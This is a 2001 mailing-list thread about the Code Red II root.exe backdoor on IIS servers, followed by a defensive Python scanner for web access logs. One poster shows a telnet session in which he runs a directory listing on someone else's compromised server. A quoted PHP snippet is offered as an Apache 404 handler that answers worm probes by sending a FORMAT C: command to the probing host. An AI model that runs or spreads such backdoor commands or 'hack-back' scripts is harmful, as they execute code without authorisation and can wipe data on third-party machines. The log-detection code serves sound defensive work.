Windows won't let you format c: as the volume is locked.  Even if it would, the format 
program would prompt "are you sure???, are you really sure???"

Although this *IS* very interesting, I found a server that would let me do this:

~$ telnet xxxxx 80
Trying xxxxx...
Connected to xxxxx
Escape character is '^]'.
GET /scripts/root.exe?/c+DIR+C: HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 07 Aug 2001 10:02:28 GMT
Content-Type: application/octet-stream
Volume in drive C is SYSTEM
Volume Serial Number is 8C36-99B1

 Directory of C:\Inetpub\scripts

05/06/2001  12:53p      <DIR>          .
05/06/2001  12:53p      <DIR>          ..
07/12/2001  08:33p                 291 default.asp
07/12/2001  08:33p                 291 default.htm
07/12/2001  08:33p                 291 index.asp
07/12/2001  08:33p                 291 index.htm
12/07/1999  06:00a             236,304 root.exe
               5 File(s)        237,468 bytes
               2 Dir(s)   3,055,824,896 bytes free
Connection closed by foreign host.
~$ 

This is not good for IIS owners.


On Tue, Aug 07, 2001 at 12:29:20PM -0700, Rob Hudson wrote:
> If anyone is malicious enough, this should format the hard drive of an
> infected host who is trying to infect your computer, but only if
> you're not running IIS.  :)
> 
> <?php
> if (eregi("default.ida", $REQUEST_URI)) {
>   $fp = fsockopen ($REMOTE_ADDR, 80, &$errno, &$errstr, 30);
>   if ($fp) { 
>     fputs ($fp, "GET /scripts/root.exe?/c+FORMAT+C: HTTP/1.0\n\n");
>   }
> }
> ?>
> 
> 
> Just use that as your 404 handler in Apache.  Of course, it's not
> tested b/c I don't want to go there.  There would probably be lots of
> repercussions, but it is real scary that this code would probably
> actually work.  
> 
> -Rob
> 
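
A defensive counterpart to the session above, as an added example that is not part of the original thread: it scans Common Log Format access-log lines for `default.ida` probes and `/scripts/root.exe` requests, decodes the command carried in the query string, and flags any 200 response, which means the backdoor answered on the server that wrote the log. The log format, function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Assumed input: Common Log Format
#   host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def classify(line):
    """Return a finding dict for a default.ida probe or a root.exe request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: not a finding
    path, _, query = m["target"].partition("?")
    path = unquote(path).lower()
    status = int(m["status"])
    if path.endswith("/default.ida"):
        return {"src": m["src"], "kind": "ida-probe", "status": status,
                "command": None, "backdoor_live": False}
    if path.endswith("/root.exe"):
        # The query carries "/c <command>" with '+' for spaces, as in the session above.
        cmd = re.sub(r"^/c\s+", "", unquote_plus(query), flags=re.I) or None
        # A 200 means this server executed the request: treat the host as compromised.
        return {"src": m["src"], "kind": "root.exe", "status": status,
                "command": cmd, "backdoor_live": status == 200}
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [07/Aug/2001:10:01:12 +0000] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 205',
    '192.0.2.10 - - [07/Aug/2001:10:02:28 +0000] "GET /scripts/root.exe?/c+DIR+C: HTTP/1.0" 200 812',
    '198.51.100.7 - - [07/Aug/2001:10:03:40 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '203.0.113.5 - - [07/Aug/2001:10:04:02 +0000] "GET /index.htm HTTP/1.0" 200 291',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        flag = "BACKDOOR ANSWERED" if f["backdoor_live"] else "no response body served"
        print(f'{f["src"]:<14} {f["kind"]:<10} {f["status"]} {f["command"]!r} {flag}')
```

A 404 on these paths only tells you who is probing; a 200 on `root.exe` in your own log is the line that calls for incident response.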
